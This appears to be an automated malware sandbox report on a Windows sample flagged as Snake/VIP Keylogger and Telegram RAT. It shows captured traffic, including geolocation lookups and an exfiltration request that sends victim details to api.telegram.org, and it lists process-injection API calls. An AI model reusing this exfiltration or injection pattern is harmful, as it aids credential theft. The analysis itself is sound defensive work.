                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfFNuZaP%2BL4tCqXohBjL9crrFNIbBnXR4YYWXxWxX6cnrXh9AMgOvEGyQemchcdMf2DebI8fVtHbn3USL11vswq2YSp%2FtxebgzU%2BaTGv7z4qkXsyky9McYwgfa%2FqASxgGhgPGPmd"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a06c28b37c6a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2005&rtt_var=769&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1407228&cwnd=218&unsent_bytes=0&cid=4385d5c52d26c735&ts=159&x=0"
                                                                                                            2025-01-11 05:49:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.749983104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:50:00 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:50:00 UTC853INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:00 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889389
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2BwRcVqQLAVajnnkjy46KvZzZjGkFxow7NxPUEaU9yfmm0DJNNGGnLGTz0etmnHrMUUA43Uf5CenHgMpYupxUUvaNe%2FubKq5pM0Dw6J9oFNVkTFkyw7LU3nQKMx8Rb9iWy51rsbC"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a073ba73c358-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1618&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=155&unsent_bytes=0&cid=cf8480db924d2956&ts=164&x=0"
                                                                                                            2025-01-11 05:50:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.749985104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:50:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:50:06 UTC855INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:06 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889395
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lL72gYfm01hddye6wqLkEDxIbE5bhnAHxCcZ%2FcYdSCoc4WIkk%2FLO3eb74bsBa8GxqHqtMRz9fmtBbctepOsek6aaLDybYBhX07o0kR9nIu7aEF1UufN2RJQtCbdid%2B1H0dv0ML2x"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a09b8a5fde95-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1815920&cwnd=243&unsent_bytes=0&cid=4b271e96dd9af172&ts=131&x=0"
                                                                                                            2025-01-11 05:50:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.749987104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:50:24 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:50:24 UTC861INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:24 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889413
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x50M5y7wup4Nb05aaOxhwgth8W3ThDRp7N3%2FonwPd9Q7JBAhTKrR52JuEC%2FBgQcqjovnKEYCVN%2FT2aNzfpqsyX5622SzKW52Lb36El%2B1NFJFRiOsdLzejaTNM%2BuweIB6%2F3vKzRgQ"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a1093c444414-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1659&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1696687&cwnd=180&unsent_bytes=0&cid=4539c2ebe9722b03&ts=177&x=0"
                                                                                                            2025-01-11 05:50:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.749989104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:50:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:50:29 UTC861INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:29 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889418
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXbdeonlAREAOUG9ymPyeltV2EeuRVyv%2Bm6ORnC7Cx49QDsABkRo9%2B2pUADhzRfc43N6VR7dYfPaSWCb2tdno%2ByyE%2Fkt4cL1GCXOJPgVlzsU7XH0Hnx1Cz%2B5ebsUmrWrURirVWDf"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a1274f4b7c6a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1985&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1431372&cwnd=218&unsent_bytes=0&cid=d965e056f1cd87b6&ts=145&x=0"
                                                                                                            2025-01-11 05:50:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.749991104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:50:32 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:50:32 UTC858INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:32 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889421
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0fMKlY7KyJD%2Fx8mktVb0LDAq6DpoLLYVI4bKmYHjpE%2BvbaD8J0DXzGNFWGR7BhIEi0JXMfCkGowbOVXyhUtWtfFd61I1s9KI%2BwQFaZnO3OLYD0EW%2FHx2M0QPOMrRvoqpSAZHNwR"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a13cc8a98ca1-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2369&min_rtt=1956&rtt_var=1029&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1492842&cwnd=168&unsent_bytes=0&cid=06139157d7fdcead&ts=147&x=0"
                                                                                                            2025-01-11 05:50:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.749992149.154.167.2204437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:50:33 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2012/01/2025%20/%2019:38:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:50:33 UTC344INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Sat, 11 Jan 2025 05:50:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-11 05:50:33 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:00:49:00
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Users\user\Desktop\sS7Jrsk0Z7.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\sS7Jrsk0Z7.exe"
                                                                                                            Imagebase:0xe60000
                                                                                                            File size:832'320 bytes
                                                                                                            MD5 hash:6DE308CE9B42F3CA44D87CD354DDE9AE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.1798101450.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:00:49:20
                                                                                                            Start date:11/01/2025
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                            Imagebase:0x8a0000
                                                                                                            File size:42'064 bytes
                                                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2528573106.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:19.2%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:4.1%
                                                                                                              Total number of Nodes:221
                                                                                                              Total number of Limit Nodes:11
                                                                                                              execution_graph 64022 901efa0 64023 901f12b 64022->64023 64024 901efc6 64022->64024 64024->64023 64026 9014b30 64024->64026 64027 901f220 PostMessageW 64026->64027 64028 901f28c 64027->64028 64028->64024 64042 901d8c0 64043 901d905 Wow64GetThreadContext 64042->64043 64045 901d94d 64043->64045 64046 500ec48 64047 500ec5e 64046->64047 64049 500bc6c 64047->64049 64050 500f2e8 CheckRemoteDebuggerPresent 64049->64050 64052 500f36e 64050->64052 64052->64047 64166 5003a68 DuplicateHandle 64167 5003afe 64166->64167 63969 901e788 63970 901e7d0 VirtualProtectEx 63969->63970 63972 901e80e 63970->63972 64029 901dfa8 64030 901dfe8 VirtualAllocEx 64029->64030 64032 901e025 64030->64032 64033 901ea28 64034 901ea6d Wow64SetThreadContext 64033->64034 64036 901eab5 64034->64036 64168 901e2e8 64169 901e330 WriteProcessMemory 64168->64169 64171 901e387 64169->64171 64053 76dbe20 64054 76dbe23 DeleteFileW 64053->64054 64056 76dbe9f 64054->64056 63973 798b988 63974 798b98b 63973->63974 63982 798ba15 63974->63982 63983 9012aa2 63974->63983 63987 901328c 63974->63987 63991 901341d 63974->63991 63995 901293d 63974->63995 63999 901278b 63974->63999 64003 9013237 63974->64003 64007 90141c7 63974->64007 64011 90146e0 63983->64011 64015 90146e8 63983->64015 63984 9012ab3 63989 90146e0 VirtualProtect 63987->63989 63990 90146e8 VirtualProtect 63987->63990 63988 90132ca 63989->63988 63990->63988 63993 90146e0 VirtualProtect 63991->63993 63994 90146e8 VirtualProtect 63991->63994 63992 9013437 63993->63992 63994->63992 63997 90146e0 VirtualProtect 63995->63997 63998 90146e8 VirtualProtect 63995->63998 63996 9012961 63997->63996 63998->63996 64001 90146e0 VirtualProtect 63999->64001 64002 90146e8 VirtualProtect 63999->64002 64000 901279c 64001->64000 64002->64000 64005 90146e0 VirtualProtect 64003->64005 64006 90146e8 VirtualProtect 64003->64006 64004 901324b 64005->64004 64006->64004 64009 90146e0 VirtualProtect 64007->64009 64010 90146e8 VirtualProtect 64007->64010 64008 90141d8 64009->64008 64010->64008 64012 90146e8 VirtualProtect 64011->64012 64014 901476a 64012->64014 64014->63984 64016 9014730 VirtualProtect 64015->64016 64017 901476a 64016->64017 64017->63984 64057 7800cd0 64058 7800cd3 64057->64058 64061 10bc4cc 64058->64061 64062 10bc4d7 64061->64062 64064 10bfbdb 64062->64064 64068 500255f 64062->64068 64063 10bfc19 64064->64063 64072 5003140 64064->64072 64077 5003150 64064->64077 64082 5002587 64068->64082 64087 5002598 64068->64087 64069 5002576 64069->64064 64074 5003171 64072->64074 64073 5003195 64073->64063 64074->64073 64101 5003708 64074->64101 64105 50036f8 64074->64105 64078 5003171 64077->64078 64079 5003195 64078->64079 64080 5003708 CreateWindowExW 64078->64080 64081 50036f8 CreateWindowExW 64078->64081 64079->64063 64080->64079 64081->64079 64083 5002598 64082->64083 64091 5002690 64083->64091 64096 5002681 64083->64096 64084 50025a7 64084->64069 64089 5002690 GetModuleHandleW 64087->64089 